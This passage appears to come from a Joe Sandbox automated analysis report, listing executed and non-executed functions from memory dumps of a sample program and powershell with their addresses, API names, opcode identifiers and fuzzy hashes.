                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007A6164124
                                                                                                                                                                                                                                  • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                                  • API String ID: 1326084662-4266787399
                                                                                                                                                                                                                                  • Opcode ID: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                                  • Instruction ID: 6d4942af2cc343f7e0b049a9721c25c27cefc5ab17265389faf7f74daf4b42a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4edba86753bbf53e9ed72b284593eff54ee3166e4bb40e5b3186a5f1b6549472
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4316DA2A0EF82C2EA12CB22E49037963A0FB89B94F444A35DE5D47B74DF7CE0458700
                                                                                                                                                                                                                                  Function 00007FFBA60980D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                  • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                  • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                  • Instruction ID: c12eb4af9d160b01c4277120f7809184ff5c60f3f1b5136144f09e309b0ebe1d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A21E3F3A0964686DBA58F39E44027D7AEAE789F84F448035DE5DC7754DE3CD1908700
                                                                                                                                                                                                                                  Function 00007FF72C66F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                  • Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                  • Instruction ID: e6e70bc9d0cd5a71794d595a94ef130351871ab5e2c65e8bef176cd5383bb8e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D821F562B0828185EB22AB11D84426DB3B3FBA8B54FE54039D64D83684CF7DE5448F62
                                                                                                                                                                                                                                  Function 00007FFBAA4C2EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                                                                                                                                                                  • String ID: ]>mBD
                                                                                                                                                                                                                                  • API String ID: 3936158736-976336857
                                                                                                                                                                                                                                  • Opcode ID: 745c3c7e2ecbac46d3d9f63b96358e37d6256b4498188150111cc3e990b537a2
                                                                                                                                                                                                                                  • Instruction ID: 3227f4c58ef33ba79d7fe40d5d2db5dffb5978cf2b869d68881137dea8440503
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 745c3c7e2ecbac46d3d9f63b96358e37d6256b4498188150111cc3e990b537a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD21D8B4A0AB02C5FA829F24F85137566A8FF88344F9055B5ED8D863A1EF7DE446C720
                                                                                                                                                                                                                                  Function 00007FF72C65FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                  • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                  • Instruction ID: d52d067b7d8bfc96dad9dc48c807845a0d80928504ad2c331d0c2c5901975ec5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9112E32619B8182EB629F15E840269B7E5FB98B94F584630DB8D07758DF3DD5518B00
                                                                                                                                                                                                                                  Function 00007FF72C67073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                  • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                  • Instruction ID: de437b14411f05c41366f98addbcf7da6c64e9c8c915a142f4c2d4a1453642d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF01842191864385F722BF60986227EB7A1FFA8768FD01839D54D42685DF3CD5098F74
                                                                                                                                                                                                                                  Function 00007FFBA6098B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                  • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                  • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                  • Instruction ID: 53a3fcbbbdb8a7748ea9ee64eee5f48c79deb23fae11a93c538b12fb88325fb6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC01FEE2B1554542DF61DB35F80115967D1F7DCB84B449032EA5DCBB55EE3CD241C700
                                                                                                                                                                                                                                  Function 00007FFBAA497E7C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: getprotobyname
                                                                                                                                                                                                                                  • String ID: protocol not found$s:getprotobyname
                                                                                                                                                                                                                                  • API String ID: 402843736-630402058
                                                                                                                                                                                                                                  • Opcode ID: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
                                                                                                                                                                                                                                  • Instruction ID: 5f5328f38836413f8954341cb03060f73fe994e0e83107b506fced1793bd4335
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd65c5a6a88a43393fd174900b5279529262fcd64829d65dad74d3ec7435cd69
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4015EA5A1EA42C2EA12CB31E9C407D23A8FF88B84B540471ED4E47B25DF2DE426C320
                                                                                                                                                                                                                                  Function 00007FFBAA493C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: inet_addr
                                                                                                                                                                                                                                  • String ID: 255.255.255.255$illegal IP address string passed to inet_aton
                                                                                                                                                                                                                                  • API String ID: 1393076350-3844699235
                                                                                                                                                                                                                                  • Opcode ID: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
                                                                                                                                                                                                                                  • Instruction ID: f37dd553680df0e616e8ef051ff90420514b177e6f0b70c899febfb0e48bc12a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 228bed37441ba182da163e3ec653cc393a3f059738861f4e152d049502361bed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F044E1A19A02D5EA119B31E8C407D2369AF85750F5411B1FD1E463A5DF2CE46A8710

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A2167FA Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1874952484.00007FFB4A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A210000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a210000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dae25da9e49e841a2b2c384bfcd7dafd8429338239d0d41eda6840b85dc88e46
                                                                                                                                                                                                                                  • Instruction ID: 21dd8dbbaa7d7384b97dfc812afe18835a671af44063bc1c72fef3a183a27bb7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dae25da9e49e841a2b2c384bfcd7dafd8429338239d0d41eda6840b85dc88e46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BD135B190EA8A4FE79ABF7888145B97FE5EF55310B2800FED44DC7093DA18AD05E391
                                                                                                                                                                                                                                  Function 00007FFB4A1497D3 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 83c071af7a63d6228d1271d6682501e39cbcaf00b591b10377b0bf2ff7490555
                                                                                                                                                                                                                                  • Instruction ID: ced3a318d4ca9b080845b92749e2ce58d04ac3c0c2a9b95e31485c5e6d10157d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83c071af7a63d6228d1271d6682501e39cbcaf00b591b10377b0bf2ff7490555
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B6104B290D79A4FE706EF3CAC561E97FA4EF53321F1841BBD48887193DA156805CB82
                                                                                                                                                                                                                                  Function 00007FFB4A02E540 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1871033325.00007FFB4A02D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A02D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a02d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3682e83f9d236c00ae3a12c032e46de12f1dd4ae224df98f9770f55a81654048
                                                                                                                                                                                                                                  • Instruction ID: d4626e136ef6458004b01f8ca828a2972f75dc0ac7ec4490c93f707da92f2bef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3682e83f9d236c00ae3a12c032e46de12f1dd4ae224df98f9770f55a81654048
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6441FF7180DBC44FE7569F3898559523FF4EF52224B1906EFE088CB2A3D625AC46C792
                                                                                                                                                                                                                                  Function 00007FFB4A14BD8D Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 99294cc549ab4c3a0e60232f8e1f0a1c61150cbd3bfcaec80403c63aec67338a
                                                                                                                                                                                                                                  • Instruction ID: 736edfba5047da56ab7ad163ae396ac574bc01ab011f73c20099f1fcdd13028c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99294cc549ab4c3a0e60232f8e1f0a1c61150cbd3bfcaec80403c63aec67338a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D931E171A0CB4C8FDB09DF6CCC496A9BBF0EF66325F0481ABD048C7152D674A419CB92
                                                                                                                                                                                                                                  Function 00007FFB4A1433B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction ID: 319a2654301e14d83db52d09acda2423b1527ae014a014e5246e42d121828ff6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001677111CB0D4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                                                                                                                                                                                  Function 00007FFB4A14A1FB Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 990da04f70c3b23d2ef731954551511ae3f2a52c8661f9a2e67120963b43433a
                                                                                                                                                                                                                                  • Instruction ID: e7f3dc23ad12f1ffca9f2eb46e63bc14de933f6762eceb86c5e70e59b55d6558
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 990da04f70c3b23d2ef731954551511ae3f2a52c8661f9a2e67120963b43433a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4F0A9B650DACD4FD741EF2C98654D5BFA4EF6620174A01EBD548C7051D6125454CBC2
                                                                                                                                                                                                                                  Function 00007FFB4A21432D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1874952484.00007FFB4A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A210000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a210000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4730a69714881a91a2e29dfcecc597b6a552ebe5f45706185d41d264e0036d1c
                                                                                                                                                                                                                                  • Instruction ID: 891bdc863acb575dcd018d0583c6547b67eeb07a2cc2f86d27acef2060a8aa6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4730a69714881a91a2e29dfcecc597b6a552ebe5f45706185d41d264e0036d1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12F09AB2A0DA4A8FD769FE6CE4414A877E0EF8432072100BAE04DC7463CA26EC41D781
                                                                                                                                                                                                                                  Function 00007FFB4A2145E0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1874952484.00007FFB4A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A210000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a210000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 50700454a81c329c770af13ff5eb64aeab4a799b81ff1d73385ec2123912a849
                                                                                                                                                                                                                                  • Instruction ID: 6302502bd8e26701b73eff246f8161e3380cf3eaa41614b384b754ebd544f4fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50700454a81c329c770af13ff5eb64aeab4a799b81ff1d73385ec2123912a849
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F05EB2A0D9898FD759FF6CE4414A87BE0EF4532576500FAE14DCB463CA26AC40D750

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A148BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
